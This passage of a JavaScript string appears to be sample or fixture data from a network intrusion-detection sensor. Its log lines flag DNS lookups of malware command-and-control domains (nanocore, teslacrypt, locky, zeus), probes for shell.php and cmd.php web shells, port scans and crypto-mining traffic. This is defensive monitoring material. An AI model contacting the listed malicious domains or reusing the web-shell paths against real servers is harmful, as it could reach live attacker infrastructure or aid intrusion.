    '"2021-01-11 02:04:30.303904" r2d2 10.3.160.42 26021 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 02:04:30.803966" r2d2 10.3.160.42 26021 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 02:04:31.206958" r2d2 10.3.160.42 26021 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 02:04:32.304016" r2d2 10.3.160.42 26021 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 02:04:39.068871" r2d2 2.200.107.146 1212 194.62.182.53 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 02:04:39.067612" r2d2 2.200.110.232 65052 2.200.107.168 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 02:04:39.103057" r2d2 2.200.110.233 63459 2.200.107.169 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 02:04:43.381290" r2d2 2.200.110.232 65429 2.200.107.168 53 UDP DNS atacoinc8897.hopto.org "nanocore (malware)" (static)\n' +
    '"2021-01-11 02:04:41.514396" r2d2 10.1.19.42 59300 208.68.240.103 80 TCP UA "OINC (BOINC client \\(windows_x86_64 7.16.7\\))" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 02:05:23.849478" r2d2 2.200.105.226 59910 208.67.222.123 53 UDP DNS pool.supportxmr.com "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 02:05:23.849599" r2d2 2.200.105.226 59910 208.67.222.123 53 UDP DNS pool.supportxmr.com "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 02:05:31.000386" r2d2 45.95.202.106 40286,41254,45820,46042,48058,48484,48782,48808,51308,54388,57092 2.200.105.85 81,82,84,86,2000,3000,5000,8000,8082,8083,9000 TCP IP 45.95.202.106 "potential port scanning" (heuristic)\n' +
    '"2021-01-11 02:05:31.000057" r2d2 45.95.202.106 33446,37162,40528,40532,41838,46628,48812,50488,56586,57502,57986,60192 2.200.105.85 80,85,88,90,91,1024,6001,6002,6004,8090,8200,8888 TCP IP 45.95.202.106 "potential port scanning" (heuristic)\n' +
    '"2021-01-11 02:05:43.384393" r2d2 2.200.110.232 65258 2.200.107.168 53 UDP DNS (www).porezna-uprava.org "balkanrat (malware)" (static)\n' +
    '"2021-01-11 02:05:43.396136" r2d2 2.200.110.232 63429 2.200.107.168 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 02:05:43.398487" r2d2 2.200.107.146 62140 194.62.183.53 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 02:05:49.116591" r2d2 2.200.110.233 64708 2.200.107.169 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 02:05:59.049617" r2d2 139.199.65.226 42487 2.200.106.86 80 TCP URL (2.200.106.86)/shell.php "web shells (suspicious)" (static)\n' +
    '"2021-01-11 02:05:59.049595" r2d2 139.199.65.226 42487 2.200.106.86 80 TCP URL (2.200.106.86)/shell.php "web shells (suspicious)" (static)\n' +
    '"2021-01-11 02:05:59.609595" r2d2 2.200.107.146 64492 194.62.182.53 53 UDP DNS atacoinc8897.hopto.org "nanocore (malware)" (static)\n' +
    '"2021-01-11 02:05:59.607519" r2d2 2.200.110.232 63654 2.200.107.168 53 UDP DNS atacoinc8897.hopto.org "nanocore (malware)" (static)\n' +
    '"2021-01-11 02:06:06.600251" r2d2 2.200.110.232 49464 2.200.107.168 53 UDP DNS 7tno4hib47vlep5o.tor2web.blutmagie.de "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 02:06:06.602250" r2d2 2.200.107.146 58823 52.58.214.33 53 UDP DNS 7tno4hib47vlep5o.tor2web.blutmagie.de "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 02:06:06.630093" r2d2 2.200.110.233 63836 2.200.107.169 53 UDP DNS 7tno4hib47vlep5o.tor2web.blutmagie.de "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 02:06:10.057943" r2d2 139.199.65.226 45422 10.110.24.13 80 TCP URL (2.200.106.86)/cmd.php "web shells (suspicious)" (static)\n' +
    '"2021-01-11 02:06:10.057946" r2d2 139.199.65.226 45422 2.200.106.86 80 TCP URL (2.200.106.86)/cmd.php "web shells (suspicious)" (static)\n' +
    '"2021-01-11 02:06:11.984826" r2d2 139.199.65.226 45915 2.200.106.86 80 TCP URL (2.200.106.86)/cmd.php "web shells (suspicious)" (static)\n' +
    '"2021-01-11 02:06:11.984899" r2d2 139.199.65.226 45915 10.110.24.13 80 TCP URL (2.200.106.86)/cmd.php "web shells (suspicious)" (static)\n' +
    '"2021-01-11 02:06:12.476282" r2d2 139.199.65.226 46057 2.200.106.86 80 TCP URL (2.200.106.86)/shell.php "web shells (suspicious)" (static)\n' +
    '"2021-01-11 02:06:12.476353" r2d2 139.199.65.226 46057 10.110.24.13 80 TCP URL (2.200.106.86)/shell.php "web shells (suspicious)" (static)\n' +
    '"2021-01-11 02:06:30.294576" r2d2 10.3.160.42 26022 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 02:06:30.396812" r2d2 10.3.160.42 26022 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 02:06:30.493917" r2d2 10.3.160.42 26022 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 02:06:30.993889" r2d2 10.3.160.42 26022 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 02:06:31.396256" r2d2 10.3.160.42 26022 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 02:06:31.895855" r2d2 10.3.160.42 26022 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 02:06:32.493563" r2d2 10.3.160.42 26022 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 02:06:51.792160" r2d2 10.11.0.51 62535 10.1.20.50 53 UDP DNS (popcorntime-update).xyz "domain (suspicious)" (static)\n' +
    '"2021-01-11 02:06:51.792168" r2d2 10.11.0.51 62535 10.1.20.50 53 UDP DNS (popcorntime-update).xyz "domain (suspicious)" (static)\n' +
    '"2021-01-11 02:06:51.793413" r2d2 2.200.109.50 62266 8.8.8.8 53 UDP DNS (popcorntime-update).xyz "domain (suspicious)" (static)\n' +
    '"2021-01-11 02:06:57.538101" r2d2 2.200.107.146 19421 193.232.128.6 53 UDP DNS tredokilo745241.ru "zeus (malware)" (static)\n' +
    '"2021-01-11 02:06:57.536444" r2d2 2.200.110.233 64530 2.200.107.168 53 UDP DNS tredokilo745241.ru "zeus (malware)" (static)\n' +
    '"2021-01-11 02:06:57.544341" r2d2 2.200.110.233 65373 2.200.107.168 53 UDP DNS banking.techpool.org "ek nuclear (malicious)" (static)\n' +
    '"2021-01-11 02:06:58.293406" r2d2 2.200.110.233 65219 2.200.107.168 53 UDP DNS (www).jesusdenazaret.com.ve "locky (malware)" (static)\n' +
    '"2021-01-11 02:06:59.121453" r2d2 2.200.110.232 63803 2.200.107.168 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 02:06:59.151530" r2d2 2.200.110.233 63748 2.200.107.168 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 02:06:59.622804" r2d2 2.200.110.232 65207 2.200.107.168 53 UDP DNS (www.2td6).xyz "domain (suspicious)" (static)\n' +
    '"2021-01-11 02:07:21.145796" r2d2 139.199.65.226 60498 10.110.24.13 80 TCP URL (2.200.106.86/images/stories)/cmd.php "web shells (suspicious)" (static)\n' +
    '"2021-01-11 02:07:21.145897" r2d2 139.199.65.226 60498 2.200.106.86 80 TCP URL (2.200.106.86/images/stories)/cmd.php "web shells (suspicious)" (static)\n' +
    '"2021-01-11 02:07:23.624115" r2d2 2.200.107.146 19087 3.92.64.194 53 UDP DNS un-blocking.info "bad wpad (suspicious)" (static)\n' +
    '"2021-01-11 02:07:23.621101" r2d2 2.200.110.233 63695 2.200.107.168 53 UDP DNS un-blocking.info "bad wpad (suspicious)" (static)\n' +
    '"2021-01-11 02:07:43.382481" r2d2 2.200.110.232 64896 2.200.107.168 53 UDP DNS atacoinc8897.hopto.org "nanocore (malware)" (static)\n' +
    '"2021-01-11 02:07:43.401205" r2d2 2.200.110.232 65126 2.200.107.168 53 UDP DNS (www).zagrebseba.net "balkanrat (malware)" (static)\n' +
    '"2021-01-11 02:07:43.403443" r2d2 2.200.107.146 13533 192.42.93.30 53 UDP DNS (www).zagrebseba.net "balkanrat (malware)" (static)\n' +
    '"2021-01-11 02:07:59.606990" r2d2 2.200.110.232 65236 2.200.107.168 53 UDP DNS 7tno4hib47vlep5o.42kdb12.net "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 02:08:07.188815" r2d2 2.200.110.233 65134 2.200.107.168 53 UDP DNS 7tno4hib47vlep5o.42kdb12.net "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 02:08:07.538094" r2d2 2.200.110.233 63231 2.200.107.168 53 UDP DNS supervision.sactown.us "ek nuclear (malicious)" (static)\n' +
    '"2021-01-11 02:08:07.539680" r2d2 2.200.107.146 35891 97.74.100.21 53 UDP DNS supervision.sactown.us "ek nuclear (malicious)" (static)\n' +
    '"2021-01-11 02:08:07.910189" r2d2 2.200.110.233 64570 2.200.107.168 53 UDP DNS recenthosts.ru "generic (malware)" (static)\n' +
    '"2021-01-11 02:08:07.911667" r2d2 2.200.107.146 64019 193.232.156.17 53 UDP DNS recenthosts.ru "generic (malware)" (static)\n' +
    '"2021-01-11 02:08:09.165242" r2d2 2.200.107.146 28062 194.62.183.53 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 02:08:09.163585" r2d2 2.200.110.232 65163 2.200.107.168 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 02:08:09.207195" r2d2 2.200.110.233 64969 2.200.107.168 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 02:08:14.594773" r2d2 139.199.65.226 6519 2.200.106.86 80 TCP URL (2.200.106.86)/shell.php "web shells (suspicious)" (static)\n' +
    '"2021-01-11 02:08:14.595038" r2d2 139.199.65.226 6519 2.200.106.86 80 TCP URL (2.200.106.86)/shell.php "web shells (suspicious)" (static)\n' +
    '"2021-01-11 02:08:17.177992" r2d2 2.200.110.233 64802 2.200.107.168 53 UDP DNS 7tno4hib47vlep5o.tor2web.fi "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 02:08:21.196360" r2d2 2.200.110.233 64802 2.200.107.169 53 UDP DNS 7tno4hib47vlep5o.tor2web.fi "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 02:08:43.404985" r2d2 2.200.110.232 63689 2.200.107.168 53 UDP DNS hdgbcnuy73wjnho9jusrnhfhejfuy78wyi7jfknv.ydns.eu "nanocore (malware)" (static)\n' +
    '"2021-01-11 02:08:43.408908" r2d2 2.200.107.146 48073 78.47.109.127 53 UDP DNS hdgbcnuy73wjnho9jusrnhfhejfuy78wyi7jfknv.ydns.eu "nanocore (malware)" (static)\n' +
    '"2021-01-11 02:08:59.607478" r2d2 2.200.110.232 63496 2.200.107.168 53 UDP DNS atacoinc8897.hopto.org "nanocore (malware)" (static)\n' +
    '"2021-01-11 02:09:17.525874" r2d2 2.200.110.232 63824 2.200.107.168 53 UDP DNS 7tno4hib47vlep5o.tor2web.blutmagie.de "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 02:09:17.527575" r2d2 2.200.107.146 56808 52.50.73.4 53 UDP DNS 7tno4hib47vlep5o.tor2web.blutmagie.de "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 02:09:17.576957" r2d2 2.200.110.233 64636 2.200.107.168 53 UDP DNS 7tno4hib47vlep5o.tor2web.blutmagie.de "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 02:09:18.677503" r2d2 2.200.110.233 65512 2.200.107.168 53 UDP DNS jesusdenazaret.com.ve "locky (malware)" (static)\n' +
    '"2021-01-11 02:09:18.678968" r2d2 2.200.107.146 6453 200.7.5.14 53 UDP DNS jesusdenazaret.com.ve "locky (malware)" (static)\n' +
    '"2021-01-11 02:09:12.205737" r2d2 10.1.19.42 59303 208.68.240.103 80 TCP UA "OINC (BOINC client \\(windows_x86_64 7.16.7\\))" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 02:09:19.225532" r2d2 2.200.110.232 63686 2.200.107.168 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 02:09:19.252766" r2d2 2.200.110.233 65242 2.200.107.168 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 02:10:27.168326" r2d2 2.200.110.232 63974 2.200.107.168 53 UDP DNS (2td6).xyz "domain (suspicious)" (static)\n' +
    '"2021-01-11 02:10:27.228311" r2d2 2.200.110.232 63670 2.200.107.168 53 UDP DNS soaring.betsystemreviews.com "ek nuclear (malicious)" (static)\n' +
    '"2021-01-11 02:10:27.228318" r2d2 2.200.110.232 64910 2.200.107.168 53 UDP DNS iynus.net "locky (malware)" (static)\n' +
    '"2021-01-11 02:10:27.229888" r2d2 2.200.107.146 59832 192.31.80.30 53 UDP DNS soaring.betsystemreviews.com "ek nuclear (malicious)" (static)\n' +
    '"2021-01-11 02:10:27.228025" r2d2 2.200.110.232 49375 2.200.107.168 53 UDP DNS foley.go2lightuniversity.com "ek nuclear (malicious)" (static)\n' +
    '"2021-01-11 02:10:27.259335" r2d2 2.200.110.233 63280 2.200.107.168 53 UDP DNS iynus.net "locky (malware)" (static)\n' +
    '"2021-01-11 02:10:27.259328" r2d2 2.200.110.233 64483 2.200.107.168 53 UDP DNS soaring.betsystemreviews.com "ek nuclear (malicious)" (static)\n' +
    '"2021-01-11 02:10:27.337585" r2d2 2.200.110.232 65280 2.200.107.168 53 UDP DNS (7tno4hib47vlep5o).42kjb11.net "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 02:10:27.372760" r2d2 2.200.110.233 65455 2.200.107.168 53 UDP DNS (7tno4hib47vlep5o).42kjb11.net "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 02:10:27.577525" r2d2 2.200.110.232 65417 2.200.107.168 53 UDP DNS supervision.sactown.us "ek nuclear (malicious)" (static)\n' +
    '"2021-01-11 02:10:27.597931" r2d2 2.200.110.232 63756 2.200.107.168 53 UDP DNS banking.techpool.org "ek nuclear (malicious)" (static)\n' +
    '"2021-01-11 02:10:27.620512" r2d2 2.200.110.232 64951 2.200.107.168 53 UDP DNS tredokilo745241.ru "zeus (malware)" (static)\n' +
    '"2021-01-11 02:10:28.178216" r2d2 2.200.110.232 65071 2.200.107.168 53 UDP DNS recenthosts.ru "generic (malware)" (static)\n' +
    '"2021-01-11 02:10:28.497811" r2d2 2.200.110.232 63705 2.200.107.168 53 UDP DNS (www).jesusdenazaret.com.ve "locky (malware)" (static)\n' +
    '"2021-01-11 02:10:28.937880" r2d2 2.200.110.232 63526 2.200.107.168 53 UDP DNS jesusdenazaret.com.ve "locky (malware)" (static)\n' +
    '"2021-01-11 02:10:29.259389" r2d2 2.200.107.146 44071 204.16.253.53 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 02:10:29.257644" r2d2 2.200.110.232 64717 2.200.107.168 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 02:10:29.286221" r2d2 2.200.110.233 64439 2.200.107.168 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 02:10:30.674657" r2d2 10.3.160.42 26024 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 02:10:30.774915" r2d2 10.3.160.42 26024 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 02:10:30.873159" r2d2 10.3.160.42 26024 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 02:10:32.273020" r2d2 10.3.160.42 26024 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 02:10:32.873670" r2d2 10.3.160.42 26024 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 02:10:43.381934" r2d2 2.200.110.232 63610 2.200.107.168 53 UDP DNS atacoinc8897.hopto.org "nanocore (malware)" (static)\n' +
    '"2021-01-11 02:10:43.383718" r2d2 2.200.107.146 11000 204.16.253.53 53 UDP DNS atacoinc8897.hopto.org "nanocore (malware)" (static)\n' +
    '"2021-01-11 02:11:00.521967" r2d2 10.43.192.103 57183 213.252.245.157 452 TCP IPORT 213.252.245.157:452 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 02:11:06.560297" r2d2 10.43.192.103 57185 213.252.245.157 452 TCP IPORT 213.252.245.157:452 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 02:11:12.595109" r2d2 10.43.192.103 57186 213.252.245.157 452 TCP IPORT 213.252.245.157:452 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 02:11:30.694653" r2d2 10.43.192.103 57191 213.252.245.157 452 TCP IPORT 213.252.245.157:452 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 02:11:39.291118" r2d2 2.200.110.232 63987 2.200.107.169 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 02:11:39.292601" r2d2 2.200.107.146 27673 204.16.253.53 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 02:11:39.319615" r2d2 2.200.110.233 63924 2.200.107.168 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 02:11:42.747251" r2d2 10.43.192.103 57193 213.252.245.157 452 TCP IPORT 213.252.245.157:452 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 02:11:40.497158" r2d2 10.1.19.42 59305 208.68.240.103 80 TCP UA "OINC (BOINC client \\(windows_x86_64 7.16.7\\))" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 02:11:48.793563" r2d2 10.43.192.103 57194 213.252.245.157 452 TCP IPORT 213.252.245.157:452 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 02:11:59.608117" r2d2 2.200.110.232 63577 2.200.107.169 53 UDP DNS atacoinc8897.hopto.org "nanocore (malware)" (static)\n' +
    '"2021-01-11 02:11:59.609491" r2d2 2.200.107.146 55260 194.62.182.53 53 UDP DNS atacoinc8897.hopto.org "nanocore (malware)" (static)\n' +
    '"2021-01-11 02:12:00.863354" r2d2 10.43.192.103 57196 213.252.245.157 452 TCP IPORT 213.252.245.157:452 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 02:12:08.078502" r2d2 2.200.110.232 63441 2.200.107.169 53 UDP DNS cdnrep.reimage.com "pua (suspicious)" (static)\n' +
    '"2021-01-11 02:12:08.079722" r2d2 2.200.107.146 64889 108.162.192.63 53 UDP DNS cdnrep.reimage.com "pua (suspicious)" (static)\n' +
    '"2021-01-11 02:12:08.512300" r2d2 2.200.110.232 63945 2.200.107.169 53 UDP DNS (webservice).reimageplus.com "pua (suspicious)" (static)\n' +
    '"2021-01-11 02:12:18.964447" r2d2 10.43.192.103 57199 213.252.245.157 452 TCP IPORT 213.252.245.157:452 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 02:12:31.047498" r2d2 10.43.192.103 57201 213.252.245.157 452 TCP IPORT 213.252.245.157:452 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 02:12:37.082672" r2d2 10.43.192.103 57202 213.252.245.157 452 TCP IPORT 213.252.245.157:452 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 02:12:43.114955" r2d2 10.43.192.103 57207 213.252.245.157 452 TCP IPORT 213.252.245.157:452 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 02:12:43.387866" r2d2 2.200.110.232 64280 2.200.107.169 53 UDP DNS content-delivery.in "afrodita (malware)" (static)\n' +
    '"2021-01-11 02:12:43.394217" r2d2 2.200.110.232 63772 2.200.107.169 53 UDP DNS 7tno4hib47vlep5o.tor2web.blutmagie.de "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 02:12:43.396168" r2d2 2.200.107.146 24516 52.50.73.4 53 UDP DNS 7tno4hib47vlep5o.tor2web.blutmagie.de "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 02:12:43.399556" r2d2 2.200.110.232 65471 2.200.107.169 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 02:12:43.401432" r2d2 2.200.107.146 5318 194.62.183.53 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 02:12:47.205875" r2d2 2.200.110.233 63364 2.200.107.168 53 UDP DNS (2td6).xyz "domain (suspicious)" (static)\n' +
    '"2021-01-11 02:12:47.255506" r2d2 2.200.110.233 64346 2.200.107.168 53 UDP DNS content-delivery.in "afrodita (malware)" (static)\n' +
    '"2021-01-11 02:12:47.264176" r2d2 2.200.110.233 64565 2.200.107.168 53 UDP DNS foley.go2lightuniversity.com "ek nuclear (malicious)" (static)\n' +
    '"2021-01-11 02:12:47.583578" r2d2 2.200.110.233 65344 2.200.107.168 53 UDP DNS 7tno4hib47vlep5o.tor2web.blutmagie.de "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 02:12:47.306159" r2d2 10.1.19.42 59306 208.68.240.103 80 TCP UA "OINC (BOINC client \\(windows_x86_64 7.16.7\\))" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 02:12:49.330832" r2d2 2.200.110.233 64343 2.200.107.168 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 02:12:55.199106" r2d2 10.43.192.103 57209 213.252.245.157 452 TCP IPORT 213.252.245.157:452 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 02:13:07.257425" r2d2 10.43.192.103 57224 213.252.245.157 452 TCP IPORT 213.252.245.157:452 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 02:13:25.213399" r2d2 2.200.110.233 64546 2.200.107.168 53 UDP DNS un-blocking.info "bad wpad (suspicious)" (static)\n' +
    '"2021-01-11 02:13:25.351183" r2d2 10.43.192.103 57254 213.252.245.157 452 TCP IPORT 213.252.245.157:452 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 02:13:31.378677" r2d2 10.43.192.103 57264 213.252.245.157 452 TCP IPORT 213.252.245.157:452 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 02:13:31.000098" r2d2 2.200.108.59 24781,24782,24783,24784,24786,24787,24789,24792,24795,24798,24799,24800,24801,24804,32812,32924,33876,34092,34388,34658,34766,36430,36448,36560,36870,36878,37360,38120,38208,38404,38486,39628,39770,40240,40398,40401,40402,40405,40406,40408,40476,40682,42214,42466,43856,43910,44458,44762,44830,44884,45576,45890,46276,46504,46566,46591,46595,46597,46702,46796,46868,48490,48798,49446,49962,50862,51458,51512,52490,52608,53206,54028,54168,55036,55640,55696,56962,58538,58742,59270,59688,59864,60104 77.53.81.105 21,6084,6685,7217,7791,8019,9147,12151,13649,14069,15646,17230,17295,18374,19202,19248,22438,22822,23606,23676,23933,26583,27119,28051,28293,28806,29096,30574,30746,32161,32631,32763,33659,34279,34775,35715,40946,43660,43956,44404,44694,45917,46447,49201,51266,51689,53053,54392,55707,55972,57413,58633,58990,60468,60822,60955,61554,61557,62114,63864,64971 TCP IP 2.200.108.59 "potential port scanning" (heuristic)\n' +
    '"2021-01-11 02:13:32.001521" r2d2 2.200.108.59 24795,24797,24798,24800,24802,24803,24805,32812,34388,35276,35708,35982,36448,36546,36970,37170,37210,37922,38490,39070,40262,40403,40408,40476,40524,40622,41006,41626,42094,43430,43524,45176,45194,45890,45928,46504,46596,46598,47380,48302,48836,48922,49948,50474,50994,51262,51692,52490,53206,53684,54028,54168,54418,55036,55248,55696,55756,56516,57250,57446,57916,59390,59430,59864,60104,60598,60602 77.53.81.105 21,6084,6356,7791,8904,10266,11013,12322,12933,14069,16366,18076,19202,19248,20840,22760,24574,25436,25653,27119,28286,28691,29025,29127,29483,30437,30776,31636,32631,32763,33955,34775,36407,36863,36986,37390,40451,42513,43802,44074,46127,47055,48947,49201,49275,51689,52893,53172,53623,54392,58851,58990,60715,61054,62114,63317,63622 TCP IP 2.200.108.59 "potential port scanning" (heuristic)\n' +
    '"2021-01-11 02:13:37.412048" r2d2 10.43.192.103 57269 213.252.245.157 452 TCP IPORT 213.252.245.157:452 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 02:13:32.001649" r2d2 2.200.108.59 24793,24794,24796,24797,24803,24805,32924,33316,33876,33924,34092,34616,35044,35276,35708,35968,36466,36546,36870,36878,36970,38486,38490,39070,39074,39770,40240,40262,40403,40404,40405,40406,40407,40524,40574,40744,41006,42214,42304,42700,43430,44458,44762,44884,45928,46574,46593,46594,46595,46597,46598,46702,46868,47380,47700,48490,48836,49010,49446,49962,50994,51008,51512,52860,52928,53426,53498,54418,55640,57230,57250,57446,57864,57916,58988,59270,59390,59506,59688,59890,60142 77.53.81.105 21,6685,7217,8019,8405,8923,10266,10474,12151,12322,12933,12969,14438,15646,15672,17230,17295,20840,22063,22760,25045,25436,25653,26583,27287,28051,28293,29096,29720,29862,30437,33659,36407,36863,38143,40451,42551,43660,43802,44074,45917,46447,46978,47055,47211,47384,48667,48934,48947,51266,52125,52893,53053,54544,55453,55972,59070,59398,59729,59771,60581,60822,60955,61054,63317,63622 TCP IP 2.200.108.59 "potential port scanning" (heuristic)\n' +
    '"2021-01-11 02:13:43.381948" r2d2 2.200.110.232 65003 2.200.107.169 53 UDP DNS atacoinc8897.hopto.org "nanocore (malware)" (static)\n' +
    '"2021-01-11 02:13:43.383615" r2d2 2.200.107.146 18515 204.16.253.53 53 UDP DNS atacoinc8897.hopto.org "nanocore (malware)" (static)\n' +
    '"2021-01-11 02:13:43.435242" r2d2 10.43.192.103 57272 213.252.245.157 452 TCP IPORT 213.252.245.157:452 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 02:13:55.502894" r2d2 10.43.192.103 57275 213.252.245.157 452 TCP IPORT 213.252.245.157:452 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 02:13:59.334106" r2d2 2.200.110.232 65327 2.200.107.169 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 02:13:59.335862" r2d2 2.200.107.146 7361 194.62.183.53 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 02:13:59.365773" r2d2 2.200.110.233 49267 2.200.107.168 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 02:14:07.583560" r2d2 10.43.192.103 57277 213.252.245.157 452 TCP IPORT 213.252.245.157:452 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 02:14:10.772942" r2d2 10.1.81.47 64105 10.1.20.50 53 UDP DNS id.remoteutilities.com "rmsrat (malware)" (static)\n' +
    '"2021-01-11 02:14:10.772926" r2d2 10.1.81.47 64105 10.1.20.50 53 UDP DNS id.remoteutilities.com "rmsrat (malware)" (static)\n' +
    '"2021-01-11 02:14:10.772945" r2d2 10.1.81.47 64105 10.1.20.50 53 UDP DNS id.remoteutilities.com "rmsrat (malware)" (static)\n' +
    '"2021-01-11 02:14:10.775855" r2d2 2.200.107.146 6101 198.41.222.173 53 UDP DNS id.remoteutilities.com "rmsrat (malware)" (static)\n' +
    '"2021-01-11 02:14:13.636205" r2d2 10.43.192.103 57278 213.252.245.157 452 TCP IPORT 213.252.245.157:452 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 02:14:07.535800" r2d2 10.44.70.211 51598 10.1.76.150 80 TCP UA "bfac (OSCE;12.0;5684;82175f2f-a04b-45f2-b621-7e826a622918;bfaceb91-6871-400d-88d4-0eda679b36a6;iCRCHdler2.82.1117)" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 02:14:18.753869" r2d2 10.43.193.193 60736 10.1.194.234 53 UDP DNS hahofaba.com "pua (suspicious)" (static)\n' +
    '"2021-01-11 02:14:18.755811" r2d2 2.200.110.233 56324 2.200.107.168 53 UDP DNS hahofaba.com "pua (suspicious)" (static)\n' +
    '"2021-01-11 02:14:18.757566" r2d2 2.200.107.146 45245 205.251.192.60 53 UDP DNS hahofaba.com "pua (suspicious)" (static)\n' +
    '"2021-01-11 02:14:18.785301" r2d2 2.200.110.232 54120 2.200.107.168 53 UDP DNS hahofaba.com "pua (suspicious)" (static)\n' +
    '"2021-01-11 02:14:25.704691" r2d2 10.43.192.103 57280 213.252.245.157 452 TCP IPORT 213.252.245.157:452 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 02:14:26.941856" r2d2 2.200.110.232 49464 2.200.107.169 53 UDP DNS wpad.ie "bad wpad (suspicious)" (static)\n' +
    '"2021-01-11 02:14:26.943549" r2d2 2.200.107.146 44885 194.146.106.142 53 UDP DNS wpad.ie "bad wpad (suspicious)" (static)\n' +
